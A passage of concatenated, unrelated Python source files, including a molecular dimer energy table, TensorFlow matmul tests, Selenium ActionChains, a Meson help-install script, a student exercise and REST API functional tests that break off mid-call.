energies[101] =  -5.73    # IndolebenzeneTshapecomplex.xyz
energies[102] =  -7.05    # Phenoldimer.xyz

names = dict()

names[81]  = "Ammoniadimer.xyz"
names[82]  = "Waterdimer.xyz"
names[83]  = "BenzeneMethanecomplex.xyz"
names[84]  = "Formicaciddimer.xyz"
names[85]  = "Formamidedimer.xyz"
names[86]  = "Uracildimerhbonded.xyz"
names[87]  = "2pyridoxine2aminopyridinecomplex.xyz"
names[88]  = "AdeninethymineWatsonCrickcomplex.xyz"
names[89]  = "Methanedimer.xyz"
names[90]  = "Ethenedimer.xyz"
names[91]  = "Benzenedimerparalleldisplaced.xyz"
names[92]  = "Pyrazinedimer.xyz"
names[93]  = "Uracildimerstack.xyz"
names[94]  = "Indolebenzenecomplexstack.xyz"
names[95]  = "Adeninethyminecomplexstack.xyz"
names[96]  = "Etheneethynecomplex.xyz"
names[97]  = "Benzenewatercomplex.xyz"
names[98]  = "Benzeneammoniacomplex.xyz"
names[99]  = "BenzeneHCNcomplex.xyz"
names[100] = "BenzenedimerTshaped.xyz"
names[101] = "IndolebenzeneTshapecomplex.xyz"
names[102] = "Phenoldimer.xyz"

from bitmovin.utils import Serializable


class AutoRestartConfiguration(Serializable):
    def __init__(self, segments_written_timeout: float = None, bytes_written_timeout: float = None,
                 frames_written_timeout: float = None, hls_manifests_update_timeout: float = None,
                 dash_manifests_update_timeout: float = None, schedule_expression: str = None):
        super().__init__()
        self.segmentsWrittenTimeout = segments_written_timeout
        self.bytesWrittenTimeout = bytes_written_timeout
        self.framesWrittenTimeout = frames_written_timeout
        self.hlsManifestsUpdateTimeout = hls_manifests_update_timeout
        self.dashManifestsUpdateTimeout = dash_manifests_update_timeout
        self.scheduleExpression = schedule_expression

from google.appengine.ext import db

class Stuff (db.Model):
    owner = db.UserProperty(required=True, auto_current_user=True)
    pulp = db.BlobProperty()

class Greeting(db.Model):
    author = db.UserProperty()
    content = db.StringProperty(multiline=True)
    avatar = db.BlobProperty()
    date = db.DateTimeProperty(auto_now_add=True)

class Placebo(db.Model):
    developer = db.StringProperty()
    OID = db.StringProperty()
    concept = db.StringProperty()
    category = db.StringProperty()
    taxonomy = db.StringProperty()
    taxonomy_version = db.StringProperty()
    code = db.StringProperty()
    descriptor = db.StringProperty()

# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

"""Tests for tensorflow.ops.math_ops.matmul."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import tensorflow.python.platform

import numpy as np
import tensorflow as tf

from tensorflow.python.kernel_tests import gradient_checker as gc


class MatMulTest(tf.test.TestCase):

  def _testCpuMatmul(self, x, y, transpose_x=False, transpose_y=False):
    x_mat = np.matrix(x).T if transpose_x else np.matrix(x)
    y_mat = np.matrix(y).T if transpose_y else np.matrix(y)
    np_ans = x_mat * y_mat
    with self.test_session(use_gpu=False):
      tf_ans = tf.matmul(x, y, transpose_x, transpose_y).eval()
    self.assertAllClose(np_ans, tf_ans)
    self.assertAllEqual(np_ans.shape, tf_ans.shape)

  def _testGpuMatmul(self, x, y, transpose_x=False, transpose_y=False):
    x_mat = np.matrix(x).T if transpose_x else np.matrix(x)
    y_mat = np.matrix(y).T if transpose_y else np.matrix(y)
    np_ans = x_mat * y_mat
    with self.test_session(use_gpu=True):
      tf_ans = tf.matmul(x, y, transpose_x, transpose_y).eval()
    self.assertAllClose(np_ans, tf_ans)
    self.assertAllEqual(np_ans.shape, tf_ans.shape)

  def _randMatrix(self, rows, cols, dtype):
    if dtype is np.complex64:
      real = self._randMatrix(rows, cols, np.float32)
      imag = self._randMatrix(rows, cols, np.float32)
      return real + np.complex(0, 1) * imag
    else:
      return np.random.uniform(low=1.0, high=100.0, size=rows * cols).reshape(
          [rows, cols]).astype(dtype)

  # Basic test:
  #   [ [1],
  #     [2],
  #     [3],   *  [1, 2]
  #     [4] ]
  def testFloatBasic(self):
    x = np.arange(1., 5.).reshape([4, 1]).astype(np.float32)
    y = np.arange(1., 3.).reshape([1, 2]).astype(np.float32)
    self._testCpuMatmul(x, y)
    self._testGpuMatmul(x, y)

  def testDoubleBasic(self):
    x = np.arange(1., 5.).reshape([4, 1]).astype(np.float64)
    y = np.arange(1., 3.).reshape([1, 2]).astype(np.float64)
    self._testCpuMatmul(x, y)

  def testInt32Basic(self):
    x = np.arange(1., 5.).reshape([4, 1]).astype(np.int32)
    y = np.arange(1., 3.).reshape([1, 2]).astype(np.int32)
    self._testCpuMatmul(x, y)

  def testSComplexBasic(self):
    x = np.arange(1., 5.).reshape([4, 1]).astype(np.complex64)
    y = np.arange(1., 3.).reshape([1, 2]).astype(np.complex64)
    self._testCpuMatmul(x, y)

  # Tests testing random sized matrices.
  def testFloatRandom(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(n, k, np.float32)
      y = self._randMatrix(k, m, np.float32)
      self._testCpuMatmul(x, y)
      self._testGpuMatmul(x, y)

  def testDoubleRandom(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(n, k, np.float64)
      y = self._randMatrix(k, m, np.float64)
      self._testCpuMatmul(x, y)

  def testInt32Random(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(n, k, np.int32)
      y = self._randMatrix(k, m, np.int32)
      self._testCpuMatmul(x, y)

  def testSComplexRandom(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(n, k, np.complex64)
      y = self._randMatrix(k, m, np.complex64)
      self._testCpuMatmul(x, y)

  # Test the cases that transpose the matrices before multiplying.
  # NOTE(keveman): The cases where only one of the inputs is
  # transposed are covered by tf.matmul's gradient function.
  def testFloatRandomTransposeBoth(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(k, n, np.float32)
      y = self._randMatrix(m, k, np.float32)
      self._testCpuMatmul(x, y, True, True)
      self._testGpuMatmul(x, y, True, True)

  def testDoubleRandomTranposeBoth(self):
    for _ in range(10):
      n, k, m = np.random.randint(1, 100, size=3)
      x = self._randMatrix(k, n, np.float64)
      y = self._randMatrix(m, k, np.float64)
      self._testCpuMatmul(x, y, True, True)

  def testMatMul_OutEmpty_A(self):
    n, k, m = 0, 8, 3
    x = self._randMatrix(n, k, np.float32)
    y = self._randMatrix(k, m, np.float32)
    self._testCpuMatmul(x, y)
    self._testGpuMatmul(x, y)

  def testMatMul_OutEmpty_B(self):
    n, k, m = 3, 8, 0
    x = self._randMatrix(n, k, np.float32)
    y = self._randMatrix(k, m, np.float32)
    self._testCpuMatmul(x, y)
    self._testGpuMatmul(x, y)

  def testMatMul_Inputs_Empty(self):
    n, k, m = 3, 0, 4
    x = self._randMatrix(n, k, np.float32)
    y = self._randMatrix(k, m, np.float32)
    self._testCpuMatmul(x, y)
    self._testGpuMatmul(x, y)


# TODO(zhifengc): Figures out how to test matmul gradients on GPU.
class MatMulGradientTest(tf.test.TestCase):

  def testGradientInput0(self):
    with self.test_session(use_gpu=False):
      x = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[3, 2],
                   dtype=tf.float64, name="x")
      y = tf.constant([1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7],
                   shape=[2, 4], dtype=tf.float64, name="y")
      m = tf.matmul(x, y, name="matmul")
      err = gc.ComputeGradientError(x, [3, 2], m, [3, 4])
    print("matmul input0 gradient err = ", err)
    self.assertLess(err, 1e-10)

  def testGradientInput1(self):
    with self.test_session(use_gpu=False):
      x = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[3, 2],
                   dtype=tf.float64, name="x")
      y = tf.constant([1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7],
                   shape=[2, 4], dtype=tf.float64, name="y")
      m = tf.matmul(x, y, name="matmul")
      err = gc.ComputeGradientError(y, [2, 4], m, [3, 4])
    print("matmul input1 gradient err = ", err)
    self.assertLess(err, 1e-10)

  def _VerifyInput0(self, transpose_a, transpose_b):
    shape_x = [3, 2]
    shape_y = [2, 4]
    if transpose_a:
      shape_x = list(reversed(shape_x))
    if transpose_b:
      shape_y = list(reversed(shape_y))
    with self.test_session(use_gpu=False):
      x = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=shape_x,
                   dtype=tf.float64, name="x")
      y = tf.constant([1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7],
                   shape=shape_y, dtype=tf.float64, name="y")
      m = tf.matmul(x, y, transpose_a, transpose_b, name="matmul")
      err = gc.ComputeGradientError(x, shape_x, m, [3, 4])
    print("matmul input0 gradient err = ", err)
    self.assertLess(err, 1e-10)

  def testGradientInput0WithTranspose(self):
    self._VerifyInput0(transpose_a=True, transpose_b=False)
    self._VerifyInput0(transpose_a=False, transpose_b=True)
    self._VerifyInput0(transpose_a=True, transpose_b=True)

  def _VerifyInput1(self, transpose_a, transpose_b):
    shape_x = [3, 2]
    shape_y = [2, 4]
    if transpose_a:
      shape_x = list(reversed(shape_x))
    if transpose_b:
      shape_y = list(reversed(shape_y))
    with self.test_session(use_gpu=False):
      x = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=shape_x,
                   dtype=tf.float64, name="x")
      y = tf.constant([1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7],
                   shape=shape_y, dtype=tf.float64, name="y")
      m = tf.matmul(x, y, transpose_a, transpose_b, name="matmul")
      err = gc.ComputeGradientError(y, shape_y, m, [3, 4])
    print("matmul input1 gradient err = ", err)
    self.assertLess(err, 1e-10)

  def testGradientInput1WithTranspose(self):
    self._VerifyInput1(transpose_a=True, transpose_b=False)
    self._VerifyInput1(transpose_a=False, transpose_b=True)
    self._VerifyInput1(transpose_a=True, transpose_b=True)


if __name__ == "__main__":
  tf.test.main()

# Copyright 2011 WebDriver committers
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""The ActionChains implementation."""
from selenium.webdriver.remote.command import Command

class ActionChains(object):
    """Generate user actions.
    All actions are stored in the ActionChains object. Call perform() to fire
    stored actions."""

    def __init__(self, driver):
        """Creates a new ActionChains.
        Args:
            driver: The WebDriver instance which performs user actions.
        """
        self._driver = driver
        self._actions = []

    def perform(self):
        """Performs all stored actions."""
        for action in self._actions:
            action()

    def click(self, on_element=None):
        """Clicks an element.
        Args:
            on_element: The element to click.
                        If None, clicks on current mouse position.
        """
        if on_element: self.move_to_element(on_element)
        self._actions.append(lambda:
            self._driver.execute(Command.CLICK, {'button': 0}))
        return self

    def click_and_hold(self, on_element):
        """Holds down the left mouse button on an element.
        Args:
            on_element: The element to mouse down.
                        If None, clicks on current mouse position.
        """
        if on_element: self.move_to_element(on_element)
        self._actions.append(lambda:
            self._driver.execute(Command.MOUSE_DOWN, {}))
        return self

    def context_click(self, on_element):
        """Performs a context-click (right click) on an element.
        Args:
            on_element: The element to context-click.
                        If None, clicks on current mouse position.
        """
        if on_element: self.move_to_element(on_element)
        self._actions.append(lambda:
            self._driver.execute(Command.CLICK, {'button': 2}))
        return self

    def double_click(self, on_element):
        """Double-clicks an element.
        Args:
            on_element: The element to double-click.
                        If None, clicks on current mouse position.
        """
        if on_element: self.move_to_element(on_element)
        self._actions.append(lambda:
            self._driver.execute(Command.DOUBLE_CLICK, {}))
        return self

    def drag_and_drop(self, source, target):
        """Holds down the left mouse button on the source element,
           then moves to the target element and releases the mouse button.
        Args:
            source: The element to mouse down.
            target: The element to mouse up.
        """
        self.click_and_hold(source)
        self.release(target)
        return self

    def drag_and_drop_by_offset(self, source, xoffset, yoffset):
        """Holds down the left mouse button on the source element,
           then moves to the target element and releases the mouse button.
        Args:
            source: The element to mouse down.
            xoffset: X offset to move to.
            yoffset: Y offset to move to.
        """
        self.click_and_hold(source)
        self.move_by_offset(xoffset, yoffset)
        self.release(source)
        return self

    def key_down(self, key, element=None):
        """Sends a key press only, without releasing it.
        Should only be used with modifier keys (Control, Alt and Shift).
        Args:
            key: The modifier key to send. Values are defined in Keys class.
            target: The element to send keys.
                    If None, sends a key to current focused element.
        """
        if element: self.click(element)
        self._actions.append(lambda:
            self._driver.execute(Command.SEND_MODIFIER_KEY_TO_ACTIVE_ELEMENT, {
                "value": key,
                "isdown": True}))
        return self

    def key_up(self, key, element=None):
        """Releases a modifier key.
        Args:
            key: The modifier key to send. Values are defined in Keys class.
            target: The element to send keys.
                    If None, sends a key to current focused element.
        """
        if element: self.click(element)
        self._actions.append(lambda:
            self._driver.execute(Command.SEND_MODIFIER_KEY_TO_ACTIVE_ELEMENT, {
                "value": key,
                "isdown": False}))
        return self

    def move_by_offset(self, xoffset, yoffset):
        """Moving the mouse to an offset from current mouse position.
        Args:
            xoffset: X offset to move to.
            yoffset: Y offset to move to.
        """
        self._actions.append(lambda:
            self._driver.execute(Command.MOVE_TO, {
                'xoffset': xoffset,
                'yoffset': yoffset}))
        return self

    def move_to_element(self, to_element):
        """Moving the mouse to the middle of an element.
        Args:
            to_element: The element to move to.
        """
        self._actions.append(lambda:
            self._driver.execute(Command.MOVE_TO, {'element': to_element.id}))
        return self

    def move_to_element_with_offset(self, to_element, xoffset, yoffset):
        """Move the mouse by an offset of the specificed element.
        Offsets are relative to the top-left corner of the element.
        Args:
            to_element: The element to move to.
            xoffset: X offset to move to.
            yoffset: Y offset to move to.
        """
        self._actions.append(lambda:
            self._driver.execute(Command.MOVE_TO, {
                'element': to_element.id,
                'xoffset': xoffset,
                'yoffset': yoffset}))
        return self

    def release(self, on_element):
        """Releasing a held mouse button.
        Args:
            on_element: The element to mouse up.
        """
        if on_element: self.move_to_element(on_element)
        self._actions.append(lambda:
            self._driver.execute(Command.MOUSE_UP, {}))
        return self

    def send_keys(self, *keys_to_send):
        """Sends keys to current focused element.
        Args:
            keys_to_send: The keys to send.
        """
        self._actions.append(lambda:
            self._driver.switch_to_active_element().send_keys(*keys_to_send))
        return self

    def send_keys_to_element(self, element, *keys_to_send):
        """Sends keys to an element.
        Args:
            element: The element to send keys.
            keys_to_send: The keys to send.
        """
        self._actions.append(lambda:
            element.send_keys(*keys_to_send))
        return self

# Copyright 2016 The Meson development team

# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at

#     http://www.apache.org/licenses/LICENSE-2.0

# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
import subprocess
import shutil
import argparse
from .. import mlog
from ..mesonlib import has_path_sep
from . import destdir_join
from .gettext import read_linguas

parser = argparse.ArgumentParser()
parser.add_argument('command')
parser.add_argument('--id', dest='project_id')
parser.add_argument('--subdir', dest='subdir')
parser.add_argument('--installdir', dest='install_dir')
parser.add_argument('--sources', dest='sources')
parser.add_argument('--media', dest='media', default='')
parser.add_argument('--langs', dest='langs', default='')
parser.add_argument('--symlinks', type=bool, dest='symlinks', default=False)

def build_pot(srcdir, project_id, sources):
    # Must be relative paths
    sources = [os.path.join('C', source) for source in sources]
    outfile = os.path.join(srcdir, project_id + '.pot')
    subprocess.call(['itstool', '-o', outfile] + sources)

def update_po(srcdir, project_id, langs):
    potfile = os.path.join(srcdir, project_id + '.pot')
    for lang in langs:
        pofile = os.path.join(srcdir, lang, lang + '.po')
        subprocess.call(['msgmerge', '-q', '-o', pofile, pofile, potfile])

def build_translations(srcdir, blddir, langs):
    for lang in langs:
        outdir = os.path.join(blddir, lang)
        os.makedirs(outdir, exist_ok=True)
        subprocess.call([
            'msgfmt', os.path.join(srcdir, lang, lang + '.po'),
            '-o', os.path.join(outdir, lang + '.gmo')
        ])

def merge_translations(blddir, sources, langs):
    for lang in langs:
        subprocess.call([
            'itstool', '-m', os.path.join(blddir, lang, lang + '.gmo'),
            '-o', os.path.join(blddir, lang)
        ] + sources)

def install_help(srcdir, blddir, sources, media, langs, install_dir, destdir, project_id, symlinks):
    c_install_dir = os.path.join(install_dir, 'C', project_id)
    for lang in langs + ['C']:
        indir = destdir_join(destdir, os.path.join(install_dir, lang, project_id))
        os.makedirs(indir, exist_ok=True)
        for source in sources:
            infile = os.path.join(srcdir if lang == 'C' else blddir, lang, source)
            outfile = os.path.join(indir, source)
            mlog.log('Installing %s to %s' % (infile, outfile))
            shutil.copyfile(infile, outfile)
            shutil.copystat(infile, outfile)
        for m in media:
            infile = os.path.join(srcdir, lang, m)
            outfile = os.path.join(indir, m)
            c_infile = os.path.join(srcdir, 'C', m)
            if not os.path.exists(infile):
                if not os.path.exists(c_infile):
                    mlog.warning('Media file "%s" did not exist in C directory' % m)
                    continue
                elif symlinks:
                    srcfile = os.path.join(c_install_dir, m)
                    mlog.log('Symlinking %s to %s.' % (outfile, srcfile))
                    if has_path_sep(m):
                        os.makedirs(os.path.dirname(outfile), exist_ok=True)
                    try:
                        try:
                            os.symlink(srcfile, outfile)
                        except FileExistsError:
                            os.remove(outfile)
                            os.symlink(srcfile, outfile)
                        continue
                    except (NotImplementedError, OSError):
                        mlog.warning('Symlinking not supported, falling back to copying')
                        infile = c_infile
                else:
                    # Lang doesn't have media file so copy it over 'C' one
                    infile = c_infile
            mlog.log('Installing %s to %s' % (infile, outfile))
            if has_path_sep(m):
                os.makedirs(os.path.dirname(outfile), exist_ok=True)
            shutil.copyfile(infile, outfile)
            shutil.copystat(infile, outfile)

def run(args):
    options = parser.parse_args(args)
    langs = options.langs.split('@@') if options.langs else []
    media = options.media.split('@@') if options.media else []
    sources = options.sources.split('@@')
    destdir = os.environ.get('DESTDIR', '')
    src_subdir = os.path.join(os.environ['MESON_SOURCE_ROOT'], options.subdir)
    build_subdir = os.path.join(os.environ['MESON_BUILD_ROOT'], options.subdir)
    abs_sources = [os.path.join(src_subdir, 'C', source) for source in sources]

    if not langs:
        langs = read_linguas(src_subdir)

    if options.command == 'pot':
        build_pot(src_subdir, options.project_id, sources)
    elif options.command == 'update-po':
        build_pot(src_subdir, options.project_id, sources)
        update_po(src_subdir, options.project_id, langs)
    elif options.command == 'build':
        if langs:
            build_translations(src_subdir, build_subdir, langs)
    elif options.command == 'install':
        install_dir = os.path.join(os.environ['MESON_INSTALL_PREFIX'], options.install_dir)
        if langs:
            build_translations(src_subdir, build_subdir, langs)
            merge_translations(build_subdir, abs_sources, langs)
        install_help(src_subdir, build_subdir, sources, media, langs, install_dir,
                     destdir, options.project_id, options.symlinks)

#
#Programa Lista 4, questão 1;
#Felipe Henrique Bastos Costa - 1615310032;
#
#
#
#


lista = []#lista vazia;
cont1 = 0#contador do indice;
cont2 = 1#contador da posição do numero, se é o primeiro, segundo etc;
v = 5#representaria o len da lista;

while(cont1 < v):
    x = int(input("Informe o %dº numero inteiro para colocar em sua lista:\n"%cont2))#x e a variavel que recebe
                                                                                     #o numero do usuario
    lista.append(x)#o numero informado para x e colocado dentro da lista;
    cont1+=1#Os contadores estao
    cont2+=1#sendo incrementados;
print("A lista de informada foi:\n%s"%lista)

# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2016 Eugene Frolov <eugene@frolov.net.ru>
#
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import random
import uuid as pyuuid

import mock
import requests
from six.moves.urllib import parse

from restalchemy.common import utils
from restalchemy.storage import exceptions
from restalchemy.storage.sql import engines
from restalchemy.tests.functional.restapi.ra_based.microservice import (
    storable_models as models)
from restalchemy.tests.functional.restapi.ra_based.microservice import consts
from restalchemy.tests.functional.restapi.ra_based.microservice import service
from restalchemy.tests.unit import base


TEMPL_SERVICE_ENDPOINT = utils.lastslash("http://127.0.0.1:%s/")
TEMPL_ROOT_COLLECTION_ENDPOINT = TEMPL_SERVICE_ENDPOINT
TEMPL_V1_COLLECTION_ENDPOINT = utils.lastslash(parse.urljoin(
    TEMPL_SERVICE_ENDPOINT, 'v1'))
TEMPL_VMS_COLLECTION_ENDPOINT = utils.lastslash(parse.urljoin(
    TEMPL_V1_COLLECTION_ENDPOINT, 'vms'))
TEMPL_VM_RESOURCE_ENDPOINT = parse.urljoin(TEMPL_VMS_COLLECTION_ENDPOINT, '%s')
TEMPL_POWERON_ACTION_ENDPOINT = parse.urljoin(
    utils.lastslash(TEMPL_VM_RESOURCE_ENDPOINT),
    'actions/poweron/invoke')
TEMPL_PORTS_COLLECTION_ENDPOINT = utils.lastslash(parse.urljoin(
    utils.lastslash(TEMPL_VM_RESOURCE_ENDPOINT), 'ports'))
TEMPL_PORT_RESOURCE_ENDPOINT = parse.urljoin(TEMPL_PORTS_COLLECTION_ENDPOINT,
                                             '%s')


class BaseResourceTestCase(base.BaseTestCase):

    def get_endpoint(self, template, *args):
        return template % ((self.service_port,) + tuple(args))

    def setUp(self):
        super(BaseResourceTestCase, self).setUp()
        engines.engine_factory.configure_factory(consts.DATABASE_URI)
        engine = engines.engine_factory.get_engine()
        self.session = engine.get_session()
        self.session.execute("""CREATE TABLE IF NOT EXISTS vms (
            uuid CHAR(36) NOT NULL,
            state VARCHAR(10) NOT NULL,
            name VARCHAR(255) NOT NULL,
            PRIMARY KEY (uuid)
        ) ENGINE=InnoDB DEFAULT CHARSET=utf8;""", None)
        self.service_port = random.choice(range(2100, 2200))
        url = parse.urlparse(self.get_endpoint(TEMPL_SERVICE_ENDPOINT))
        self._service = service.RESTService(bind_host=url.hostname,
                                            bind_port=url.port)
        self._service.start()

    def tearDown(self):
        super(BaseResourceTestCase, self).tearDown()
        self._service.stop()
        self.session.execute("DROP TABLE IF EXISTS vms;", None)


class TestRootResourceTestCase(BaseResourceTestCase):

    def test_get_versions_list(self):

        response = requests.get(self.get_endpoint(
            TEMPL_ROOT_COLLECTION_ENDPOINT))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), ["v1"])


class TestVersionsResourceTestCase(BaseResourceTestCase):

    def test_get_resources_list(self):

        response = requests.get(
            self.get_endpoint(TEMPL_V1_COLLECTION_ENDPOINT))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), ["vms"])


class TestVMResourceTestCase(BaseResourceTestCase):

    def _insert_vm_to_db(self, uuid, name, state):
        vm = models.VM(uuid=uuid, name=name, state=state)
        vm.save()

    def _vm_exists_in_db(self, uuid):
        try:
            models.VM.objects.get_one(filters={'uuid': uuid})
            return True
        except exceptions.RecordNotFound:
            return False

    @mock.patch('uuid.uuid4')
    def test_create_vm_resource_successful(self, uuid4_mock):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        uuid4_mock.return_value = RESOURCE_ID
        vm_request_body = {
            "name": "test"
        }
        vm_response_body = {
            "uuid": str(RESOURCE_ID),
            "name": "test",
            "state": "off"
        }
        LOCATION = self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT, RESOURCE_ID)

        response = requests.post(self.get_endpoint(
            TEMPL_VMS_COLLECTION_ENDPOINT), json=vm_request_body)

        self.assertEqual(response.status_code, 201)
        self.assertEqual(response.headers['location'], LOCATION)
        self.assertEqual(response.json(), vm_response_body)

    def test_get_vm_resource_by_uuid_successful(self):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        self._insert_vm_to_db(uuid=RESOURCE_ID, name="test", state="off")
        vm_response_body = {
            "uuid": str(RESOURCE_ID),
            "name": "test",
            "state": "off"
        }
        VM_RES_ENDPOINT = self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                            RESOURCE_ID)

        response = requests.get(VM_RES_ENDPOINT)

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), vm_response_body)

    def test_update_vm_resource_successful(self):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        self._insert_vm_to_db(uuid=RESOURCE_ID, name="old", state="off")
        vm_request_body = {
            "name": "new"
        }
        vm_response_body = {
            "uuid": str(RESOURCE_ID),
            "name": "new",
            "state": "off"
        }
        VM_RES_ENDPOINT = self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                            RESOURCE_ID)

        response = requests.put(VM_RES_ENDPOINT, json=vm_request_body)

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), vm_response_body)

    def test_delete_vm_resource_successful(self):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        self._insert_vm_to_db(uuid=RESOURCE_ID, name="test", state="off")

        VM_RES_ENDPOINT = self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                            RESOURCE_ID)

        response = requests.delete(VM_RES_ENDPOINT)

        self.assertEqual(response.status_code, 204)
        self.assertFalse(self._vm_exists_in_db(RESOURCE_ID))

    def test_process_vm_action_successful(self):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        self._insert_vm_to_db(uuid=RESOURCE_ID, name="test", state="off")
        vm_response_body = {
            "uuid": str(RESOURCE_ID),
            "name": "test",
            "state": "on"
        }
        POWERON_ACT_ENDPOINT = self.get_endpoint(TEMPL_POWERON_ACTION_ENDPOINT,
                                                 RESOURCE_ID)

        response = requests.post(POWERON_ACT_ENDPOINT)

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), vm_response_body)

    def test_get_collection_vms_successful(self):
        RESOURCE_ID1 = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        RESOURCE_ID2 = pyuuid.UUID("00000000-0000-0000-0000-000000000002")
        self._insert_vm_to_db(uuid=RESOURCE_ID1, name="test1", state="off")
        self._insert_vm_to_db(uuid=RESOURCE_ID2, name="test2", state="on")
        vm_response_body = [{
            "uuid": str(RESOURCE_ID1),
            "name": "test1",
            "state": "off"
        }, {
            "uuid": str(RESOURCE_ID2),
            "name": "test2",
            "state": "on"
        }]

        response = requests.get(self.get_endpoint(
            TEMPL_VMS_COLLECTION_ENDPOINT))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), vm_response_body)


class TestNestedResourceTestCase(BaseResourceTestCase):

    def setUp(self):
        super(TestNestedResourceTestCase, self).setUp()
        self.session.execute("""CREATE TABLE IF NOT EXISTS ports (
            uuid CHAR(36) NOT NULL,
            mac CHAR(17) NOT NULL,
            vm CHAR(36) NOT NULL,
            PRIMARY KEY (uuid),
            CONSTRAINT FOREIGN KEY ix_vms_uuid (vm) REFERENCES vms (uuid)
        ) ENGINE=InnoDB DEFAULT CHARSET=utf8;""", None)
        self.vm1 = models.VM(
            uuid=pyuuid.UUID("00000000-0000-0000-0000-000000000001"),
            name="vm1",
            state="on")
        self.vm1.save(session=self.session)
        self.vm2 = models.VM(
            uuid=pyuuid.UUID("00000000-0000-0000-0000-000000000002"),
            name="vm2",
            state="off")
        self.vm2.save(session=self.session)
        self.session.commit()

    def tearDown(self):
        self.session.execute("DROP TABLE IF EXISTS ports;", None)
        super(TestNestedResourceTestCase, self).tearDown()

    @mock.patch('uuid.uuid4')
    def test_create_nested_resource_successful(self, uuid4_mock):
        VM_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        PORT_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000003")
        uuid4_mock.return_value = PORT_RESOURCE_ID
        port_request_body = {
            "mac": "00:00:00:00:00:03"
        }
        port_response_body = {
            "uuid": str(PORT_RESOURCE_ID),
            "mac": "00:00:00:00:00:03",
            "vm": parse.urlparse(
                self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                  VM_RESOURCE_ID)).path
        }
        LOCATION = self.get_endpoint(TEMPL_PORT_RESOURCE_ENDPOINT,
                                     VM_RESOURCE_ID,
                                     PORT_RESOURCE_ID)

        response = requests.post(
            self.get_endpoint(TEMPL_PORTS_COLLECTION_ENDPOINT, VM_RESOURCE_ID),
            json=port_request_body)

        self.assertEqual(response.status_code, 201)
        self.assertEqual(response.headers['location'], LOCATION)
        self.assertEqual(response.json(), port_response_body)

    def test_get_nested_resource_successful(self):
        VM_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        PORT_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000003")
        port = models.Port(uuid=PORT_RESOURCE_ID,
                           mac="00:00:00:00:00:03",
                           vm=self.vm1)
        port.save(session=self.session)
        self.session.commit()
        port_response_body = {
            "uuid": str(PORT_RESOURCE_ID),
            "mac": "00:00:00:00:00:03",
            "vm": parse.urlparse(
                self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                  VM_RESOURCE_ID)).path
        }

        response = requests.get(
            self.get_endpoint(TEMPL_PORT_RESOURCE_ENDPOINT,
